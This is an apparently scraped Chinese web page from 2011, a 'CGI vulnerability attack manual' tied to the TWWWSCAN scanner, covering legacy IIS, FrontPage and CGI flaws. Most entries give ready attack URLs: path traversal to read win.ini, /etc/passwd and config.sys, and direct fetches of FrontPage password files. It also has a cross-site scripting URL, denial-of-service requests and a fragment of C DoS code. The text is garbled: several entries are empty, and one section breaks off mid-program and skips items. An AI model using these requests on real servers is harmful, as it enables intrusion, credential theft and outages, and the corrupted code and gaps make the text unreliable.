TWWWSCAN漏洞扫描器CGI漏洞攻击手册

TWWWSCAN漏洞扫描器CGI漏洞攻击手册
2011年07月13日
　　1．carbo.dll
　　iCat Carbo服务器一个网络购物程序，它被 PC杂评为最好的网络购物软件.安全专家Mikael Johansson发现 iCat Carbo服务器版本 3.0.0.中存在一个漏洞，这个漏洞让我们每个人查看系统中的任何文件在(除文件之外和一些特殊字符).
　　攻击方法：
　　提交这样的http请求 :
　　http://host/carbo.dll?icatcommand=file_to_view&catalogname=catalog
　　http会做如下回应:
　　[iCat Carbo Server (ISAPI, Release) Version 3.0.0 Release Build 244]
　　Error: (-1007) cannot open file 'C:\web\carbohome\file_to_view.htm'
　　查看win.ini文件： c:\winnt\win.ini:
　　http://host/carbo.dll?icatcommand=..\..\winnt\win.ini&catalogname=catalog
　　____________________________________________________________________________________
　　2．uploader.exe
　　如果您使用NT作为您的WebServer的操作系统,入侵者能够利用uploader.exe上传任何文件。
　　攻击方法： http://host/cgi-win/uploader.exe
　　会带你到上传页面，剩下的事就不用我告诉你了把？：）
　　____________________________________________________________________________________
　　3．search97.vts
　　这个文件将能使入侵者任意的读取你系统中启动httpd用户能读取的文件。
　　攻击方法： http://www.xxx.com/search97.vts
　　?HLNavigate=On&querytext=dcm
　　&ServerKey=Primary
　　&ResultTemplate=../../../../../../../etc/passwd
　　&ResultStyle=simple
　　&ResultCount=20
　　&collection=books
　　____________________________________________________________________________________
　　4．newdsn.exe
　　个存在于/scripts/tools目录下的newdsn.exe文件允许任何一个用户在web根目录下创建任何文件。另外，在某些特定条件下，利用newdsn.exe可能使IIS遭受拒绝服务攻击，如果攻击成功，将导致IIS停止响应连接请求。
　　攻击方法：
　　1． 创建文件：http://xxx.xxx.xxx.xxx/scripts/tools/newdsn.exe?driver=Microsoft%2BAccess%2BDriver%2B%28*.mdb%29&dsn=Evil2+samples+from+microsoft&dbq=..%2F..%2Fwwwroot%2Fevil2.htm&newdb=CREATE_DB&attr=
　　2． D.o.s攻击：提交下列连接请求：
　　http://www.example.com/Scripts/Tools/Newdsn.exe?Createdatabase
　　如果IIS是有问题的版本，浏览器将不会显示任何信息。当下列两种情况中的任意一种发生时，都会导致拒绝服务：
　　- 重新启动WWW服务时： 这将导致IIS挂起。不能重新启动WWW服务，总是显示"端口已经被占用"的错误信息。
　　- 停止WWW服务： IIS将会停止 。但是IIS的数据库部分并没有死掉，仍然会响应80端口发来的请求，因此，如果再次提交一个请求： http://www.example.com/Scripts/Tools/Newdsn.exe?Createdatabase
　　IIS会产生保护性错误。
　　____________________________________________________________________________________
　　5．getdrvs.exe
　　____________________________________________________________________________________
　　6. _vti_inf.html
　　____________________________________________________________________________________
　　7. service.pwd http://www.hostname.com/_vti_pvt/service.pwd可读,将暴露用户密码信息.
　　攻击方法：
　　访问http://host/_vti_pvt/service.pwd [service.pwd]正是所需要的密码文件，如果我们粗心的网管没有设置权限的话，那浏览器就会显示出对方的密码文件。
　　____________________________________________________________________________________
　　8．users.pwd
　　UNix系统的http://www.hostname.com/_vti_pvt/users.pwd可读,将暴露用户密码信息。
　　攻击方法：
　　访问http://www.hostname.com/_vti_pvt/users.pwd。
　　____________________________________________________________________________________
　　9．authors.pwd
　　UNix系统的http://www.hostname.com/_vti_pvt/authors.pwd可读,将暴露用户密码信息。
　　攻击方法：
　　访问http://www.hostname.com/_vti_pvt/authors.pwd。
　　____________________________________________________________________________________
　　10．administrators.pwd
　　UNix系统的http://www.hostname.com/_vti_pvt/administrators.pwd可读,将暴露用户密码信息。
　　攻击方法：
　　访问http://www.hostname.com/_vti_pvt/administrators.pwd。
　　____________________________________________________________________________________
　　11．shtml.dll
　　在Frontpage Extention Server/Windows2000 Server上输入一个不存在的文件将可以得到web目录的本地路径信息. 但是如果我们请求并非HTML、SHTML或者ASP后缀的文件，我们将会得到不同的信息. Hostile Code Here">http://TrustedServer如果用户点击上述指定的链接，脚本将通过HTTP请求从客户端传送给可信任的站点，可信任站点然后将该脚本作为错误信息的一部分返回给客户端。客户端在收到包含该脚本的出错页面时，将执行该脚本，并将赋予来自可信任站点的内容的所有权力赋予该脚本。另外，shtml.dll对较长的带html后缀的文件名都会进行识别和处理，利用这一点，可以对IIS服务器执行DOS攻击，以下这个程序，能使目标服务器的CPU占用率达到 100%，并且耗用所有的应用程序日志空间。系统在数分钟内会报告应用程序日志已满。
　　攻击方法：
　　1. 暴露路径：http://www.victim.com/_vti_bin/shtml.dll/something.html
　　这样将返回以下信息：
　　Cannot open "d:\inetpub\wwwroot\postinfo1.html": no such file or folder.
　　2. 可信任站点执行脚本：使用如下格式的URL： http://iis5server/_vti_bin/shtml.dll/alert('document.domain='+document.domain)
　　3. D.o.s攻击：使用下面的程序可以能使目标服务器的CPU占用率达到 100%，并且耗用所有的应用程序日志空间。
　　#include
　　#include
　　#include
　　#include
　　#include
　　void Dos(void *chara);
　　void main(int argc,char *argv[])
　　{
　　WORD wVersionRequested;
　　WSADATA wsaData;
　　int err;
　　long lDo ;
　　if (argc ...\n");
　　for (lDo = 0 ;lDo ..)的攻击，这是由于在WINDOW中允许连续的点被解释为级连的目录如'cd ...',解释为'cd ..\..'.而Sybase PowerDynamo，老版本的vqServer允许远程攻击者绕过WEB安全系统横贯到其他目录。
　　攻击方法：
　　假如CONFIG.SYS存在在根目录下，就能读文件。 http://example.com/...................../config.sys
　　列出根目录。 http://example.com/../../../../../../
　　____________________________________________________________________________________
　　15．advsearch.asp
　　____________________________________________________________________________________
　　16． autoexec.bat
　　现在很多web服务器上存在这个安全问题,例如Jana Webserver,URL Live 1.0 webserver等.恶意的用户可能利用该漏洞来退出HTTP root目录,从而到达上层的目录树中.在URL中使用"../",攻击者们可以获得WEB SERVER有权读取的任何文件.
　　攻击方法： http://127.0.0.1:8080/../../../autoexec.bat 这样将读取系统中的autoexec.bat文件
　　这个漏洞的利用还取决于系统目录的结构而定.
　　____________________________________________________________________________________
　　17．achg.htr aexp.htr aexp2.htr aexp2b.htr aexp3.htr aexp4.htr aexp4b.htr anot.htr anot3.htr
　　IIS4.0中包含一个有趣的特征就是允许远程用户攻击WEB服务器上的用户帐号，就是你的WEB服务器是通过NAT来转换地址的，还可以被攻击。每个IIS4.0安装的时候建立一个虚拟目录/iisadmpwd，这个目录包含多个.htr文件，匿名用户允许访问这些文件，这些文件刚好没有规定只限制在loopback addr(127.0.0.1)，请求这些文件就跳出对话框让你通过WEB来修改用户的帐号和密码。这个目录物理映射在下面的目录下：
　　c:\winnt\system32\inetsrv\iisadmpwd
　　攻击方法：
　　访问：http://example.com/iisadmpwd/*.htr的页面，并利用工具对其进行穷举。
　　____________________________________________________________________________________
　　18．visadmin.exe
　　这个漏洞可以在服务器中一直产生临时文件知道服务器的硬盘慢了为止。任何人都可以远程的来完成。
　　使用使用在cgi-bin中默认的 visadmin.exe (Visitor Administrator)
　　攻击方法：
　　提交以下请求： http://www.targets.com/cgi-bin/visadmin.exe?user=guest
　　____________________________________________________________________________________
　　19．no-such-file.pl
　　这个漏洞会暴露其服务器上的路径，当你访问这个页面时会显示类似以下信息：
　　CGI Error
　　The specified CGI application misbehaved by not returning a complete set of
　　HTTP headers. The headers it did return are:
　　Can't open perl script "C:\InetPub\scripts\no-such-file.pl": No such file or
　　Directory
　　从此我们可以知道这个页面的物理路径为C:\InetPub\scripts\no-such-file.pl
　　攻击方法：
　　访问http://www.targets.com/cgi-bin/scripts/no-such-file.pl